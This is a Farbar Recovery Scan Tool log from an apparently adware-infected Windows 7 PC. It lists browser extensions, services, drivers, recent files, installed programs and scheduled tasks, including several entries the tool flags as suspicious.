FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)

FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)

 

Chrome: 

=======

CHR HomePage: Default -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_BxXqKONdz_l55SXbUBFaelXxQ6FYsEP8nGn0cy4u6BOH71F9xR_w45AKw8gaDhEAj0LFaN3Kqh8UdHeedyrnXNxZnuEsiFiaXLsezceIcYL4WAcEbRYpVuDGvENFYHWbqUft83oNYtd_skgFfCteXkv2Qv-S5HxfywgtREicUwJ4,

CHR NewTab: Default ->  Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"

CHR Session Restore: Default -> is enabled.

CHR Profile: C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default [2017-04-23]

CHR Extension: (Google Slides) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-07]

CHR Extension: (Google Docs) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-07]

CHR Extension: (Adblock Plus) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-04-07]

CHR Extension: (Adobe Acrobat) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-04-07]

CHR Extension: (Google Sheets) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-07]

CHR Extension: (Google Docs Offline) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-07]

CHR Extension: (Speed Dial 2) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2017-04-07]

CHR Extension: (Chrome Web Store Payments) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-07]

CHR Extension: (Material Simple Dark Grey) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ookepigabmicjpgfnmncjiplegcacdbm [2017-04-21]

CHR Extension: (Gmail) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-07]

CHR Extension: (Chrome Media Router) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-07]

CHR Extension: (Canvas Rider) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\poknhlcknimnnbfcombaooklofipaibk [2017-04-07]

CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2017-04-23] () [File not signed]

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)

R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)

S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [236832 2015-10-21] (EasyAntiCheat Ltd)

S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]

R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282096 2014-02-24] (Intel Corporation)

R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)

R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)

S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)

S4 Affenpinscher; C:\ProgramData\\Affenpinscher\\Affenpinscher.exe shuz -f "C:\ProgramData\\Affenpinscher\\Affenpinscher.dat" -l -a

S4 ddwnlzad; C:\Windows\system32\config\systemprofile\AppData\Local\Unojoyfix.exe innproduct ddwnlzad [X]

S4 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X]

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [303616 2017-02-25] () [File not signed]

R3 btUrbFilterDrv; C:\Windows\System32\Drivers\IvtUrbBtFlt.sys [50272 2013-12-16] (Ralink Corporation)

R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2015-09-26] ()

R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)

R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)

R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)

R3 RSP2STOR; C:\Windows\System32\DRIVERS\RtsP2Stor.sys [293592 2014-04-16] (Realtek Semiconductor Corp.)

R3 rtbth; C:\Windows\System32\DRIVERS\rtbth.sys [1205448 2014-04-30] (Ralink Technology, Corp.)

R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [31472 2014-05-05] (Synaptics Incorporated)

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2017-04-23 17:01 - 2017-04-23 17:01 - 00002116 _____ C:\Users\HP\Desktop\JRT.txt

2017-04-23 16:55 - 2017-04-23 17:02 - 00000000 ____D C:\Users\HP\Desktop\ad

2017-04-23 16:52 - 2017-04-23 16:52 - 00006502 _____ C:\Users\HP\Desktop\Fixlog.txt

2017-04-23 16:50 - 2017-04-23 16:50 - 01663672 _____ (Malwarebytes) C:\Users\HP\Desktop\JRT.exe

2017-04-23 16:10 - 2017-04-23 16:49 - 00000000 ____D C:\AdwCleaner

2017-04-23 16:09 - 2017-04-23 07:09 - 00694192 _____ (SQLite Development Team) C:\Windows\system32\sqlite3.dll

2017-04-23 10:20 - 2017-04-23 10:20 - 03643566 _____ C:\Program Files\Common Files\a5lv5db5.exe

2017-04-23 10:14 - 2017-04-23 10:14 - 00003388 _____ C:\Windows\System32\Tasks\xn1jw5fm

2017-04-23 10:14 - 2017-04-23 10:14 - 00000000 ____D C:\Program Files\Common Files\zuszl5xx

2017-04-23 09:13 - 2017-04-23 09:13 - 00000000 ____D C:\Program Files\BitTorrent

2017-04-23 09:12 - 2017-04-23 15:02 - 00000000 ____D C:\ProgramData\Logic Cramble

2017-04-22 16:55 - 2017-04-23 17:02 - 00000000 ____D C:\FRST

2017-04-22 12:30 - 2017-04-22 12:30 - 00000000 ____D C:\ProgramData\Electronic Arts

2017-04-21 15:44 - 2017-04-21 15:44 - 00001220 _____ C:\Users\HP\Desktop\OBS Studio (32bit).lnk

2017-04-21 15:41 - 2017-04-21 21:26 - 00000000 ____D C:\Users\HP\AppData\Roaming\obs-studio

2017-04-21 15:40 - 2017-04-21 15:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio

2017-04-21 15:39 - 2017-04-21 15:40 - 00000000 ____D C:\Program Files (x86)\obs-studio

2017-04-21 08:50 - 2017-04-21 08:50 - 00000000 ____D C:\Program Files (x86)\ParentalControl

2017-04-21 08:45 - 2017-04-22 08:31 - 00000000 ____D C:\Program Files (x86)\51dc062d-c4d5-4a36-8902-edc3d32064671492753523

2017-04-19 16:18 - 2017-04-19 16:18 - 00000000 ____D C:\Users\HP\AppData\Local\modloader

2017-04-19 10:41 - 2017-04-22 13:43 - 00061811 _____ C:\Windows\icm32.exe

2017-04-19 10:41 - 2017-04-19 10:41 - 00003320 _____ C:\Windows\System32\Tasks\RegIdleBackup

2017-04-08 18:58 - 2017-04-12 06:46 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe

2017-04-08 18:58 - 2017-04-12 06:46 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

2017-04-08 18:58 - 2017-04-12 06:46 - 00004462 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier

2017-04-08 18:58 - 2017-04-12 06:46 - 00004324 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater

2017-04-08 18:57 - 2017-04-12 06:45 - 00000000 ____D C:\Windows\system32\Macromed

2017-04-07 21:35 - 2017-04-07 22:06 - 00001708 _____ C:\Users\Public\Desktop\League of Legends.lnk

2017-04-07 21:35 - 2017-04-07 21:35 - 00000000 ____D C:\Riot Games

2017-04-07 21:35 - 2017-04-07 21:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends

2017-04-07 19:59 - 2017-04-12 06:46 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2017-04-07 19:59 - 2017-04-12 06:46 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2017-04-07 17:33 - 2017-04-07 17:33 - 00000000 ____D C:\Users\HP\AppData\Roaming\Opera Software

2017-04-07 13:20 - 2017-04-07 13:20 - 00000000 ____D C:\ProgramData\Malwarebytes

2017-04-07 07:36 - 2017-04-23 16:55 - 00000000 ____D C:\Users\HP\AppData\LocalLow\uTorrent

2017-04-02 12:38 - 2015-07-02 12:05 - 00218112 _____ C:\Users\HP\Desktop\IMRP.Launcher.exe

2017-03-25 13:57 - 2017-03-25 13:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO

2017-03-25 13:14 - 2017-03-25 13:53 - 00000000 ____D C:\Users\HP\AppData\LocalLow\Mozilla

2017-03-25 13:14 - 2017-03-25 13:19 - 00000000 ____D C:\Users\HP\AppData\Local\Mozilla

2017-03-25 13:14 - 2017-03-25 13:14 - 00000000 ____D C:\Users\HP\AppData\Roaming\Mozilla

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2017-04-23 17:02 - 2009-07-14 07:45 - 00020688 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2017-04-23 17:02 - 2009-07-14 07:45 - 00020688 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2017-04-23 16:55 - 2015-10-25 08:09 - 00000000 ____D C:\Users\HP\AppData\Roaming\uTorrent

2017-04-23 16:54 - 2009-07-14 08:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2017-04-23 15:03 - 2015-10-31 18:13 - 00000000 ____D C:\Program Files (x86)\Steam

2017-04-23 15:03 - 2015-09-12 19:41 - 00000000 ____D C:\Users\HP\AppData\Roaming\Skype

2017-04-23 13:06 - 2015-09-12 07:16 - 00000000 ___HD C:\Users\HP

2017-04-23 10:24 - 2015-09-12 07:17 - 00001182 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

2017-04-22 21:42 - 2015-09-21 16:58 - 00000000 ____D C:\Users\HP\Documents\FIFA 14

2017-04-22 08:37 - 2015-09-12 07:17 - 00000983 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk

2017-04-22 08:11 - 2015-09-28 09:30 - 00000000 ____D C:\Users\HP\AppData\Roaming\vlc

2017-04-21 20:02 - 2015-10-12 17:31 - 00000000 ____D C:\ProgramData\Package Cache

2017-04-21 08:51 - 2009-07-14 08:32 - 00000000 ____D C:\Program Files\MSBuild

2017-04-19 21:42 - 2016-12-14 13:49 - 00000000 ____D C:\Users\HP\Desktop\Backups

2017-04-19 07:57 - 2015-09-24 16:14 - 00000000 ____D C:\Users\HP\AppData\Local\Steam

2017-04-14 09:36 - 2015-12-30 14:59 - 00001019 _____ C:\Users\HP\Desktop\sprint binds.txt

2017-04-12 06:45 - 2015-09-19 15:17 - 00000000 ____D C:\Windows\SysWOW64\Macromed

2017-04-11 15:09 - 2016-02-04 18:11 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

2017-04-11 15:08 - 2016-02-04 18:10 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2017-04-08 18:58 - 2016-02-04 18:07 - 00000000 ____D C:\Users\HP\AppData\Local\Adobe

2017-04-08 01:06 - 2015-09-12 18:45 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

2017-04-07 21:36 - 2016-07-09 10:13 - 00000000 ____D C:\Users\HP\AppData\Roaming\Riot Games

2017-04-07 20:01 - 2015-09-12 18:28 - 00000000 ____D C:\Program Files (x86)\Google

2017-04-07 19:59 - 2015-09-12 18:27 - 00000000 ____D C:\Users\HP\AppData\Local\Deployment

2017-04-07 19:53 - 2017-02-03 18:42 - 00000000 ____D C:\Users\HP\AppData\Local\Discord

2017-04-07 19:53 - 2015-09-19 12:36 - 00000000 ____D C:\Users\HP\AppData\Roaming\Mumble

2017-04-07 19:53 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\inf

2017-04-07 19:52 - 2015-09-12 18:28 - 00000000 ____D C:\Users\HP\AppData\Local\Google

2017-04-07 19:52 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\registration

2017-04-07 19:51 - 2016-06-12 16:49 - 00000000 ____D C:\Games

2017-04-07 17:48 - 2017-03-23 16:26 - 00000000 ____D C:\Users\HP\AppData\Local\Opera Software

2017-04-04 16:22 - 2015-09-13 10:02 - 00000000 ____D C:\Program Files\PowerISO

2017-04-03 20:08 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\system32\NDF

2017-03-28 11:07 - 2015-09-16 19:47 - 00000000 ____D C:\Windows\SysWOW64\directx

2017-03-25 17:32 - 2015-09-13 08:44 - 00000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games

2017-03-25 13:57 - 2015-09-13 10:02 - 00000812 _____ C:\Users\Public\Desktop\PowerISO.lnk

 

==================== Files in the root of some directories =======

 

2017-04-23 10:20 - 2017-04-23 10:20 - 3643566 _____ () C:\Program Files\Common Files\a5lv5db5.exe

2015-10-24 13:43 - 2016-10-07 20:59 - 0007605 _____ () C:\Users\HP\AppData\Local\Resmon.ResmonCfg

2015-11-19 19:41 - 2015-11-19 19:41 - 0000003 _____ () C:\Users\HP\AppData\Local\updater.log

2015-11-19 19:41 - 2015-11-19 19:42 - 0000059 _____ () C:\Users\HP\AppData\Local\UserProducts.xml

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

 

LastRegBack: 2017-04-22 12:00

 

==================== End of FRST.txt ============================

 

 

Fresh addition.txt

Spoiler

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23-04-2017 01

Ran by HP (23-04-2017 17:03:27)

Running from C:\Users\HP\Desktop\ad

Windows 7 Professional (X64) (2015-09-12 04:16:35)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-1988295413-3700943990-1798627009-500 - Administrator - Disabled)

Guest (S-1-5-21-1988295413-3700943990-1798627009-501 - Limited - Disabled)

HP (S-1-5-21-1988295413-3700943990-1798627009-1000 - Administrator - Enabled) => C:\Users\HP

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}

AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

"FIFA 14" (HKLM-x32\...\{6049054B-DB11-48E1-A583-9A565D5C8856}_is1) (Version: 1.3.0.0 - )

µTorrent (HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\uTorrent) (Version: 3.4.9.43388 - BitTorrent Inc.)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)

Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)

AutoHotkey 1.1.22.09 (HKLM\...\AutoHotkey) (Version: 1.1.22.09 - Lexikos)

CLEO 4.3 (HKLM-x32\...\{A8F37EB0-C741-41D7-8CAB-5B40ECEEF094}_is1) (Version: 4.3 - Seemann, Deji, Alien)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)

Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden

GTA:SA Crash Fix-v2.4 (HKLM-x32\...\GTA:SA Crash Fix-v2.4) (Version: v2.4 - Whitetiger)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3431 - Intel Corporation)

Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)

League of Legends (HKLM-x32\...\League of Legends 4.2.1) (Version: 4.2.1 - Riot Games)

League of Legends (x32 Version: 4.2.1 - Riot Games) Hidden

Lightshot-5.3.0.0 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.3.0.0 - Skillbrains)

Metric Collection SDK 35 (x32 Version: 1.2.0010.00 - Lenovo Group Limited) Hidden

Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)

Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)

Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)

Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)

Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)

Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)

Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)

Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)

NVIDIA PhysX (HKLM-x32\...\{3F5C371F-8EA2-4F25-9D3D-D0B4526E3AEA}) (Version: 9.10.0513 - NVIDIA Corporation)

OBS Studio (HKLM-x32\...\OBS Studio) (Version: 18.0.1 - OBS Project)

Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version: 15.0.4420.1017 - Microsoft Corporation) Hidden

ParentalControl(x86) (HKU\.DEFAULT\...\ParentalControl) (Version:  - )

PowerISO (HKLM-x32\...\PowerISO) (Version: 6.8 - Power Software Ltd)

Project Zomboid (HKLM\...\Steam App 108600) (Version:  - The Indie Stone)

Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)

Skype™ 7.10 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.10.101 - Skype Technologies S.A.)

Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)

TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)

VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

 

==================== Custom CLSID (Whitelisted): ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

CustomCLSID: HKU\S-1-5-21-1988295413-3700943990-1798627009-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

 

==================== Scheduled Tasks (Whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

Task: {09F5CBAD-E307-4F17-A703-07B1F2BF3CE9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-07] (Google Inc.)

Task: {22F66836-DF7B-4793-9F04-FC8E255DD02E} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => %ProgramFiles%\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe 

Task: {2ADBDC4B-09A5-4957-8021-596523253262} - System32\Tasks\{B057C60C-3FC4-43D4-86B4-ADB5B47005C4} => pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon\nfs_uninst.exe" -d "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon"

Task: {2E6AD43C-9B7E-4B4D-B127-8DDA400429C4} - System32\Tasks\Realtek HD Audio => C:\Users\HP\AppData\Roaming\SecuROM\Realtek HD\rthdcpl.exe [2016-06-12] () <==== ATTENTION

Task: {3325DDD7-BD30-4A5F-8A4F-9241EBE43365} - System32\Tasks\RegIdleBackup => C:\windows\icm32.exe [2017-04-22] ()

Task: {44507965-AB32-45A0-9037-627912BE4D51} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)

Task: {6FC221A6-B17C-4DBB-9BDF-F541A7FEB435} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-07] (Google Inc.)

Task: {9E71D6F2-9FDF-4F84-A08A-4BF032E1A962} - System32\Tasks\{9DC3C148-A635-469D-B6C5-7B48EC8BEC4C} => pcalua.exe -a "C:\Program Files (x86)\TeamSpeak 3 Client\package_inst.exe" -d C:\Users\HP\Desktop -c "C:\Users\HP\Desktop\ts3_overlay-v3.8.23.ts3_plugin"

Task: {ADCCA0FF-17F1-4288-ABB2-91EE4F64F7CF} - System32\Tasks\xn1jw5fm => C:\Program Files\Common Files\zuszl5xx\84bb0m3yxqdli.exe [2017-04-23] () <==== ATTENTION

